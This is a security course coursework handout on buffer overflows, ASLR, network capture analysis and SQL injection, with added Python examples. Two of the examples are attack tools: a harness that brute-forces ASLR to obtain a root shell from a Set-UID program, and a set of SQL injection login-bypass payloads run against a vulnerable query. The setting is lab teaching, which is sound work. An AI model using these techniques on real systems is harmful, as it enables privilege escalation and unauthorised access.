IY2840 Coursework 2
Deadline: 10:00am, 25th March 2022
This coursework aims to have you reflect on attacks and their mitigations. To get started, it is important that you review the lecture material and the course text. You are also expected to investigate online and/or library resources. We are not after essays in this coursework. We are after concise and succinct responses to each question, and suggest using bullet points and sketches where appropriate. Please make sure that any resource you use is suitably acknowledged, as submissions are routinely checked for plagiarism. You are free to choose the referencing style.
The total number of marks in this coursework is 100. This is a blind submission, and submissions are to be uploaded in PDF format on Moodle. The PDF file should contain all screenshots and source code requested. Specifics for these are indicated with blue underlined text. Do not include screenshots or source code as separate files. This coursework counts for 20% of your grade on this module.
It is recommended that you use the SEED lab VMs to perform any tasks required for this coursework.
Question 1: Linux and Application Security
(a) An organisation is running a service to welcome its agents by printing a greeting message along with their name on their terminal screen. The developer in this organisation has created the C program (vulnerable-prog.c) to implement this service on the Ubuntu 32-bit Linux server, and you are asked to compile the program and manage its permissions in the operating system.
i. [3 marks] Compile the vulnerable-prog.c file using gcc, but you have to disable the stack-smashing protection feature (gcc's -fno-stack-protector) and enable the executable-stack feature (-z execstack) to be able to solve the subsequent questions. Then, run the program and provide a terminal screenshot of the outcome in your report.
ii. [2 marks] The compiled program (file) has to be a root-owned Set-UID program. Provide the commands you would execute to achieve this. Show the program file permissions in a terminal screenshot in your report.
(b) A cyber security team in the organisation has discovered that the previous program (vulnerable-prog.c) is vulnerable to a stack-based buffer overflow. As a pentester, you have been assigned to perform a penetration test to check whether this vulnerability is exploitable on the system. You need to prepare the payload and exploit which will be used for spawning a shell with root permission. You have an exploit file (exploit.c), but this source-code file is missing some statements.
i. [15 marks] Fix the exploit.c file by completing the missing parts of this file. Replace all instances of ? with the appropriate instructions or values to be able to compile and run the exploit program. Beforehand, you will need to understand the buffer-overflow exploit program and how the shellcode is injected to mount a successful attack [Hint: you may need to review the stack frame layout]. You may need to turn off the buffer-overflow countermeasure features while compiling and running the program (i.e. kernel.randomize_va_space = 0). Provide the amended exploit.c code with your changes highlighted in your PDF.
ii. [3 marks] Briefly explain and justify the entire program after fixing it and provide a screenshot of the execution output in your PDF.
(c) [12 marks] Briefly explain three countermeasures used in Linux to prevent stack-based buffer-overflow attacks. Include in your answer how to enable them or how to check whether they are already enabled.
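Two of the usual countermeasures (non-executable stack and the stack protector) are recorded in the binary itself, and the third (ASLR) in a sysctl, so all three can be checked without readelf or checksec. The following is an added example, not part of the coursework handout: it parses the PT_GNU_STACK program header of an ELF file to see whether the stack will be mapped executable (what readelf -lW shows as RW versus RWE), looks for the __stack_chk_fail symbol name that gcc pulls in when -fstack-protector is active, and reads kernel.randomize_va_space from /proc. The small ELF image it builds for the demonstration is constructed here and is not a real compiled program; the file name vulnerable-prog is assumed.

```python
#!/usr/bin/env python3
"""Check stack-hardening state of an ELF binary and the kernel ASLR setting.

Added example, not part of the coursework handout. The tiny ELF image built
by build_elf32_stub() is constructed for the demonstration only.
"""
import struct
import sys

PT_GNU_STACK = 0x6474E551   # program header that records the requested stack permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def gnu_stack_flags(data):
    """Return the p_flags of the PT_GNU_STACK header, or None if the binary has none.

    Handles ELF32 and ELF64, little- and big-endian.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    end = {1: "<", 2: ">"}[data[5]]          # EI_DATA: 1 = LSB, 2 = MSB
    if data[4] == 1:                          # EI_CLASS: ELFCLASS32
        (e_phoff,) = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
        flags_off = 24                        # p_flags follows six 4-byte fields
    elif data[4] == 2:                        # ELFCLASS64
        (e_phoff,) = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
        flags_off = 4                         # p_flags directly follows p_type
    else:
        raise ValueError("unknown ELF class")
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from(end + "I", data, base)
        if p_type == PT_GNU_STACK:
            return struct.unpack_from(end + "I", data, base + flags_off)[0]
    return None


def stack_is_executable(data):
    """True when the loader will map the stack executable (the -z execstack state).

    On x86 Linux a binary with no PT_GNU_STACK header gets an executable stack
    by default, so a missing header counts as executable too.
    """
    flags = gnu_stack_flags(data)
    return flags is None or bool(flags & PF_X)


def has_stack_protector(data):
    """Heuristic used by checksec-style tools: a binary built with gcc's
    -fstack-protector imports __stack_chk_fail, so the name appears in the file."""
    return b"__stack_chk_fail" in data


def aslr_level():
    """kernel.randomize_va_space: 0 = off, 1 = stack/mmap/VDSO, 2 = also brk heap.
    Same value as 'sysctl kernel.randomize_va_space'; None if /proc is unavailable."""
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def build_elf32_stub(stack_flags):
    """Constructed sample: a 52-byte ELF32 header plus one PT_GNU_STACK program
    header carrying stack_flags. Not runnable code, just enough for the parser."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # class 32, LSB, version 1
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", e_ident,
                       2, 3, 1, 0,          # ET_EXEC, EM_386, EV_CURRENT, e_entry
                       52, 0, 0,            # e_phoff (right after the header), e_shoff, e_flags
                       52, 32, 1, 0, 0, 0)  # e_ehsize, e_phentsize, e_phnum, section fields
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr


def report(data):
    return {
        "executable_stack": stack_is_executable(data),
        "stack_protector": has_stack_protector(data),
        "randomize_va_space": aslr_level(),
    }


if __name__ == "__main__":
    if len(sys.argv) > 1:                     # e.g. ./vulnerable-prog (assumed name)
        with open(sys.argv[1], "rb") as f:
            data = f.read()
    else:                                     # no file given: use the constructed stub
        data = build_elf32_stub(PF_R | PF_W | PF_X)
    print(report(data))
```

Run it as python3 check_hardening.py ./vulnerable-prog (script name assumed). For the binary from part (a) the expected answer is executable_stack True and stack_protector False; the stack-protector check is a heuristic on the symbol name, so a binary that merely embeds that string would be misreported.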
(d) [15 marks] Turn on the ASLR countermeasure (i.e. kernel.randomize_va_space = 2, which randomises the layout of the process address space, including the stack and the heap) and run the exploit program (the amended exploit.c file) again. Briefly explain the observation and provide a screenshot in your report. Then, write a program to defeat this countermeasure. The program should also include a feature to display the cost of defeating it, using the metric of either the actual time (hh:mm:ss) or the number of runs. Briefly explain the scripts and provide a screenshot of the output in your PDF. Include your source code in your PDF. Note: In order to answer this part, you should have already solved part (b).
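The brute-force approach this part asks for, as an added example that is not part of the coursework handout: with ASLR on, the stack address guessed by the exploit is wrong on most runs, the target jumps into unmapped or invalid memory and the kernel kills it with SIGSEGV or SIGILL; subprocess reports a signal death as a negative return code, so the harness below simply re-runs the target until a run is not signal-killed and reports both metrics (number of runs and elapsed hh:mm:ss). It assumes the fixed exploit from part (b) has already written its payload and that the Set-UID target is called ./vulnerable-prog (an assumed name). When no target is given it runs against a constructed stand-in that crashes a fixed number of times and then exits normally, so the harness can be exercised anywhere.

```python
#!/usr/bin/env python3
"""Brute-force an ASLR-protected target and report the cost (runs and hh:mm:ss).

Added example for Q1(d); not part of the coursework handout. It assumes the
fixed exploit from Q1(b) has already written its payload and that the Set-UID
target is ./vulnerable-prog (an assumed name). With no argument it runs
against a constructed stand-in so the harness can be exercised anywhere.
"""
import os
import subprocess
import sys
import tempfile
import time


def guess_succeeded(returncode):
    """With ASLR on, a wrong guess sends the target into garbage memory and the
    kernel kills it (SIGSEGV, SIGILL or SIGBUS). subprocess reports a signal
    death as a negative return code, so any run that was NOT signal-killed is
    taken as the shellcode having run (the shell it spawned exiting normally)."""
    return returncode >= 0


def fmt_hms(seconds):
    s = int(seconds)
    return "%02d:%02d:%02d" % (s // 3600, (s % 3600) // 60, s % 60)


def brute_force(cmd, max_runs=None, interactive=False):
    """Re-run cmd until one run survives, or max_runs is reached.

    interactive=True leaves stdin/stdout attached to the terminal so that a
    root shell spawned by the shellcode can actually be used; the harness then
    reports after that shell exits."""
    io = None if interactive else subprocess.DEVNULL
    start = time.monotonic()
    runs, rc = 0, None
    while max_runs is None or runs < max_runs:
        runs += 1
        rc = subprocess.run(cmd, stdin=io, stdout=io, stderr=io).returncode
        if guess_succeeded(rc):
            break
    return {
        "success": rc is not None and guess_succeeded(rc),
        "runs": runs,
        "elapsed": fmt_hms(time.monotonic() - start),
        "last_returncode": rc,
    }


# Constructed stand-in for the Set-UID target: dies with SIGSEGV (a wrong
# address guess) for the first N runs, then exits normally (the guess "hit").
_FAKE_TARGET = r"""
import os, signal, sys
counter, fail_runs = sys.argv[1], int(sys.argv[2])
n = int(open(counter).read()) + 1 if os.path.exists(counter) else 1
open(counter, "w").write(str(n))
if n <= fail_runs:
    os.kill(os.getpid(), signal.SIGSEGV)
"""


def make_fake_target(fail_runs):
    """Command line for the stand-in; the run counter lives in a fresh temp dir."""
    counter = os.path.join(tempfile.mkdtemp(prefix="aslr-demo-"), "runs")
    return [sys.executable, "-c", _FAKE_TARGET, counter, str(fail_runs)]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        result = brute_force(sys.argv[1:], interactive=True)   # e.g. ./vulnerable-prog
    else:
        result = brute_force(make_fake_target(fail_runs=5))
    print("succeeded after %d run(s) in %s" % (result["runs"], result["elapsed"])
          if result["success"] else "gave up after %d run(s)" % result["runs"])
```

Against the real target run it as python3 brute_force.py ./vulnerable-prog; the loop stops when the spawned shell exits, so check with id or whoami inside that shell that it is root before typing exit. The survival test is a heuristic: a run whose overwritten return address happens to land on code that returns cleanly would also count as a hit, which is why the shell itself is the confirmation.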
Question 2: Network Security
(a) A security analyst team has the capture1.pcap, capture2.pcap and capture3.pcap files, which are network traffic captures of different network segments. They need to identify potential attacks in these files. You are asked to assist them in their task by doing the following:
i. [15 marks] Examine these pcap files to determine the attacks within them using Wireshark; keep in mind, each file contains only one attack. Justify your answers, including a description of the identified attacks and, where necessary, screenshots of the parts of the traffic (in the pcap files) which show the attacks.
ii. [5 marks] It is important for security analysts to understand suspicious activity in pcap files. This is often done by reproducing attacks. Set up and execute the attack identified in capture3.pcap. Provide a screenshot of the network traffic caused by your attack in Wireshark. Note: your pcap and the provided pcap files are not expected to be identical. You are not expected to reproduce the pcap content line by line, but it has to be the same attack.
Question 3: Web Security
A company owns a website which is used for managing the employee records of the company. This website runs on a webserver using the Python code provided (CW2WebServer.py). The webserver can be run on the SEEDLabs VM with the command python3 CW2WebServer.py. The webserver runs locally and can be accessed at localhost:8081. Be advised that when the webserver is restarted, it resets the database. In order to access the website resources, you need login credentials. However, this website is vulnerable to SQL injection (SQLi) and cross-site scripting (XSS) attacks. It is suggested you use two VMs: one as the web server and one as the attacker.
(a) [10 marks] How can an attacker bypass the website login without having access credentials? Assume there is an admin user for this system. Justify your answer, showing at least three different patterns of injection, and provide screenshots in your PDF.
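The login-bypass patterns asked for above, shown against a vulnerable query and its parameterised fix, as an added example that is not part of the coursework handout and is not taken from CW2WebServer.py (whose source is not on this page). The users table, its columns and the string-built query are assumptions that mirror a typical unsafe login handler; the rows are constructed and the database is an in-memory SQLite one.

```python
#!/usr/bin/env python3
"""Login bypass by SQL injection: vulnerable query vs. parameterised query.

Added example; not part of the coursework handout and not taken from
CW2WebServer.py, whose source is not on this page. The users table, its
columns and the string-built query are assumptions that mirror a typical
unsafe login handler. Uses an in-memory SQLite database with constructed rows.
"""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "Sup3rS3cret!"), ("alice", "alice-pass")])  # constructed sample rows
    return db


def login_vulnerable(db, username, password):
    """The form fields are pasted straight into the SQL text, so a quote in the
    input ends the string literal and the rest of the input becomes SQL."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Same logic with bound parameters: the driver sends the values separately
    from the SQL text, so quotes, comments and OR clauses stay inside the value."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


# Three injection patterns for the login form, as (username, password) pairs.
PAYLOADS = {
    # 1. Close the string, then comment out the password check; names the target user.
    "comment out password": ("admin'-- ", "x"),
    # 2. Always-true predicate; logs in as whichever row the database returns first.
    "always-true OR": ("' OR 1=1-- ", "x"),
    # 3. No comment needed: AND binds tighter than OR, so the final OR '1'='1' wins.
    "OR in both fields": ("' OR '1'='1", "' OR '1'='1"),
}


def run_all(db):
    """Map each pattern to (user returned by the vulnerable login, user returned by the fixed one)."""
    return {name: (login_vulnerable(db, u, p), login_fixed(db, u, p))
            for name, (u, p) in PAYLOADS.items()}


if __name__ == "__main__":
    db = make_db()
    for name, (vuln, fixed) in run_all(db).items():
        print("%-22s vulnerable -> %-6s fixed -> %s" % (name, vuln, fixed))
```

Pattern 1 is the one to use when the question says to assume an admin user: it names the account and needs no knowledge of the password. Patterns 2 and 3 return the first matching row, which is admin here only because it was inserted first. If the real server hashes the password before building the query, only the username field is injectable, and patterns 1 and 2 still work. The trailing space after -- is harmless in SQLite and required by MySQL.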
SK/GS March 2022